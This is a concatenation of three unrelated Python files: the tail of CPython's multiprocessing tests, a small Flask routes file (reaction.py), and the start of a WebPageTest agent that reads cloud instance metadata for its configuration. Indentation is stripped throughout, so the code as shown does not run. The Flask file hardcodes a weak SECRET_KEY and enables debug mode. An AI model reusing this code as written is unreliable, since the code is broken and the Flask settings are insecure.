p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['spawn', 'fork'] or
methods == ['fork', 'spawn', 'forkserver'] or
methods == ['spawn', 'fork', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestResourceTracker(unittest.TestCase):
def test_resource_tracker(self):
#
# Check that killing process does not leak named semaphores
#
cmd = '''if 1:
import time, os, tempfile
import multiprocessing as mp
from multiprocessing import resource_tracker
from multiprocessing.shared_memory import SharedMemory
mp.set_start_method("spawn")
rand = tempfile._RandomNameSequence()
def create_and_register_resource(rtype):
if rtype == "semaphore":
lock = mp.Lock()
return lock, lock._semlock.name
elif rtype == "shared_memory":
sm = SharedMemory(create=True, size=10)
return sm, sm._name
else:
raise ValueError(
"Resource type {{}} not understood".format(rtype))
resource1, rname1 = create_and_register_resource("{rtype}")
resource2, rname2 = create_and_register_resource("{rtype}")
os.write({w}, rname1.encode("ascii") + b"\\n")
os.write({w}, rname2.encode("ascii") + b"\\n")
time.sleep(10)
'''
for rtype in resource_tracker._CLEANUP_FUNCS:
with self.subTest(rtype=rtype):
if rtype == "noop":
# Artefact resource type used by the resource_tracker
continue
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd.format(w=w, rtype=rtype)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
while time.monotonic() < deadline:
time.sleep(.5)
try:
_resource_unlink(name2, rtype)
except OSError as e:
# docs say it should be ENOENT, but OSX seems to give
# EINVAL
self.assertIn(e.errno, (errno.ENOENT, errno.EINVAL))
break
else:
raise AssertionError(
f"A {rtype} resource was leaked after a process was "
f"abruptly terminated.")
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = ('resource_tracker: There appear to be 2 leaked {} '
'objects'.format(
rtype))
self.assertRegex(err, expected)
self.assertRegex(err, r'resource_tracker: %r: \[Errno' % name1)
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
support.wait_process(pid, exitcode=-signal.SIGKILL)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("resource_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGTERM, False)
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@staticmethod
def _is_resource_tracker_reused(conn, pid):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
# The pid should be None in the child process, expect for the fork
# context. It should not be a new value.
reused = _resource_tracker._pid in (None, pid)
reused &= _resource_tracker._check_alive()
conn.send(reused)
def test_resource_tracker_reused(self):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._is_resource_tracker_reused,
args=(w, pid))
p.start()
is_resource_tracker_reused = r.recv()
# Clean up
p.join()
w.close()
r.close()
self.assertTrue(is_resource_tracker_reused)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
def test_close(self):
queue = multiprocessing.SimpleQueue()
queue.close()
# closing a queue twice should not fail
queue.close()
# Test specific to CPython since it tests private attributes
@test.support.cpython_only
def test_closed(self):
queue = multiprocessing.SimpleQueue()
queue.close()
self.assertTrue(queue._reader.closed)
self.assertTrue(queue._writer.closed)
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
@hashlib_helper.requires_hashdigest('md5')
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in not_exported are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
not_exported=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
parent_process = staticmethod(multiprocessing.parent_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
support.print_warning('Shared objects which still exist '
'at manager shutdown:')
support.print_warning(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
if type_ == 'manager':
Temp = hashlib_helper.requires_hashdigest('md5')(Temp)
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.util._cleanup_tests()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
|
reaction.py
|
"""Core Flask app routes."""
from flask import Flask, render_template, url_for, redirect, flash
from flask import current_app as app
from flask_wtf import FlaskForm
from wtforms import StringField,SubmitField
from wtforms.validators import DataRequired
from application.maindriver import ytload,twload
from application import create_app,reload_app
from multiprocessing import Process
import os
import datetime
#from application.plotlydash.dashboard import create_dashboard
#app = Flask(__name__)
app.config['SECRET_KEY'] = 'acbsd'
@app.route("/")
@app.route("/home")
def home():
return render_template('home.html')
@app.route("/about")
def about():
return render_template('about.html', title='About')
@app.route("/overview")
def overview():
return render_template('overview.html', title='Overview')
@app.route("/twitter")
def twitter():
return render_template('twitter.html', title='Twitter')
@app.route("/reddit")
def reddit():
return render_template('reddit.html', title='Reddit')
@app.route("/youtube")
def youtube():
return render_template('youtube.html', title='Youtube')
@app.route("/analyse", methods=['GET','POST'])
def analyse():
class inputform(FlaskForm):
query=StringField('Enter the term you want to analyse.', validators=[DataRequired()])
submit= SubmitField('Gather Data')
form=inputform()
if form.is_submitted():
#twload(form.query.data)
#ytload(form.query.data)
if True:
p = Process(target=twload, args=(form.query.data,))
p.start()
p.join()
app = create_app()
if __name__ == "__main__":
app.run(debug=True)
flash(f'Almost done! Now CLICK on Dashboard to start creating your analytics dashboard for {form.query.data}.','success')
return redirect(url_for('home'))
return render_template('analyse.html', title='Analyse',form=form)
if __name__=='__main__':
app.run(debug=True)
|
webpagetest.py
|
# Copyright 2017 Google Inc. All rights reserved.
# Use of this source code is governed by the Apache 2.0 license that can be
# found in the LICENSE file.
"""Main entry point for interfacing with WebPageTest server"""
from datetime import datetime
import gzip
import logging
import os
import platform
import Queue
import re
import shutil
import socket
import subprocess
import threading
import time
import urllib
import zipfile
import psutil
import monotonic
import ujson as json
DEFAULT_JPEG_QUALITY = 30
class WebPageTest(object):
"""Controller for interfacing with the WebPageTest server"""
# pylint: disable=E0611
def __init__(self, options, workdir):
import requests
self.fetch_queue = Queue.Queue()
self.fetch_result_queue = Queue.Queue()
self.job = None
self.first_failure = None
self.session = requests.Session()
self.options = options
self.fps = options.fps
self.test_run_count = 0
self.log_formatter = logging.Formatter(fmt="%(asctime)s.%(msecs)03d - %(message)s",
datefmt="%H:%M:%S")
self.log_handler = None
# Configurable options
self.url = options.server
self.location = ''
self.test_locations = []
if options.location is not None:
self.test_locations = options.location.split(',')
self.location = str(self.test_locations[0])
self.key = options.key
self.time_limit = 120
self.cpu_scale_multiplier = None
# get the hostname or build one automatically if we are on a vmware system
# (specific MAC address range)
hostname = platform.uname()[1]
interfaces = psutil.net_if_addrs()
if interfaces is not None:
logging.debug('Interfaces:')
logging.debug(interfaces)
for interface in interfaces:
iface = interfaces[interface]
for addr in iface:
match = re.search(r'^00[\-:]50[\-:]56[\-:]00[\-:]'\
r'([\da-fA-F]+)[\-:]([\da-fA-F]+)$', addr.address)
if match:
server = match.group(1).strip('0')
machine = match.group(2)
hostname = 'VM{0}-{1}'.format(server, machine)
self.pc_name = hostname if options.name is None else options.name
self.auth_name = options.username
self.auth_password = options.password if options.password is not None else ''
self.validate_server_certificate = options.validcertificate
self.instance_id = None
self.zone = None
# Get the screen resolution if we're in desktop mode
self.screen_width = None
self.screen_height = None
if not self.options.android and not self.options.iOS:
if self.options.xvfb:
self.screen_width = 1920
self.screen_height = 1200
elif platform.system() == 'Windows':
from win32api import GetSystemMetrics
self.screen_width = GetSystemMetrics(0)
self.screen_height = GetSystemMetrics(1)
elif platform.system() == 'Darwin':
try:
from AppKit import NSScreen
self.screen_width = int(NSScreen.screens()[0].frame().size.width)
self.screen_height = int(NSScreen.screens()[0].frame().size.height)
except Exception:
pass
# See if we have to load dynamic config options
if self.options.ec2:
self.load_from_ec2()
elif self.options.gce:
self.load_from_gce()
# Set the session authentication options
if self.auth_name is not None:
self.session.auth = (self.auth_name, self.auth_password)
self.session.verify = self.validate_server_certificate
if options.cert is not None:
if options.certkey is not None:
self.session.cert = (options.cert, options.certkey)
else:
self.session.cert = options.cert
# Set up the temporary directories
self.workdir = os.path.join(workdir, self.pc_name)
self.persistent_dir = self.workdir + '.data'
self.profile_dir = os.path.join(self.workdir, 'browser')
if os.path.isdir(self.workdir):
try:
shutil.rmtree(self.workdir)
except Exception:
pass
# If we are running in a git clone, grab the date of the last
# commit as the version
self.version = '17.12'
try:
directory = os.path.abspath(os.path.dirname(__file__))
out = subprocess.check_output('git log -1 --format=%cd --date=raw',
shell=True, cwd=directory)
if out is not None:
matches = re.search(r'^(\d+)', out)
if matches:
timestamp = int(matches.group(1))
git_date = datetime.utcfromtimestamp(timestamp)
self.version = git_date.strftime('%y%m%d.%H%m%S')
except Exception:
pass
# Load the discovered browser margins
self.margins = {}
margins_file = os.path.join(self.persistent_dir, 'margins.json')
if os.path.isfile(margins_file):
with open(margins_file, 'rb') as f_in:
self.margins = json.load(f_in)
# Override the public webpagetest server automatically
if self.url is not None and self.url.find('www.webpagetest.org') >= 0:
self.url = 'http://agent.webpagetest.org/work/'
# pylint: enable=E0611
def benchmark_cpu(self):
"""Benchmark the CPU for mobile emulation"""
self.cpu_scale_multiplier = 1.0
if not self.options.android and not self.options.iOS:
import hashlib
logging.debug('Starting CPU benchmark')
hash_val = hashlib.sha256()
with open(__file__, 'rb') as f_in:
hash_data = f_in.read(4096)
start = monotonic.monotonic()
# 106k iterations takes ~1 second on the reference machine
for _ in xrange(106000):
hash_val.update(hash_data)
elapsed = monotonic.monotonic() - start
self.cpu_scale_multiplier = 1.0 / elapsed
logging.debug('CPU Benchmark elapsed time: %0.3f, multiplier: %0.3f',
elapsed, self.cpu_scale_multiplier)
def get_persistent_dir(self):
"""Return the path to the persistent cache directory"""
return self.persistent_dir
def load_from_ec2(self):
"""Load config settings from EC2 user data"""
import requests
session = requests.Session()
proxies = {"http": None, "https": None}
# The Windows AMI's use static routes which are not copied across regions.
# This sets them up before we attempt to access the metadata
if platform.system() == "Windows":
from .os_util import run_elevated
directory = os.path.abspath(os.path.dirname(__file__))
ec2_script = os.path.join(directory, 'support', 'ec2', 'win_routes.ps1')
run_elevated('powershell.exe', ec2_script)
ok = False
while not ok:
try:
response = session.get('http://169.254.169.254/latest/user-data',
timeout=30, proxies=proxies)
if len(response.text):
self.parse_user_data(response.text)
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
ok = False
while not ok:
try:
response = session.get('http://169.254.169.254/latest/meta-data/instance-id',
timeout=30, proxies=proxies)
if len(response.text):
self.instance_id = response.text.strip()
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
ok = False
while not ok:
try:
response = session.get(
'http://169.254.169.254/latest/meta-data/placement/availability-zone',
timeout=30, proxies=proxies)
if len(response.text):
self.zone = response.text.strip()
if not len(self.test_locations):
self.location = self.zone[:-1]
if platform.system() == "Linux":
self.location += '-linux'
self.test_locations = [self.location]
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
def load_from_gce(self):
"""Load config settings from GCE user data"""
import requests
session = requests.Session()
proxies = {"http": None, "https": None}
ok = False
while not ok:
try:
response = session.get(
'http://169.254.169.254/computeMetadata/v1/instance/attributes/wpt_data',
headers={'Metadata-Flavor':'Google'},
timeout=30, proxies=proxies)
if len(response.text):
self.parse_user_data(response.text)
ok = True
except Exception:
pass
if not ok:
time.sleep(10)
ok = False
while not ok:
try:
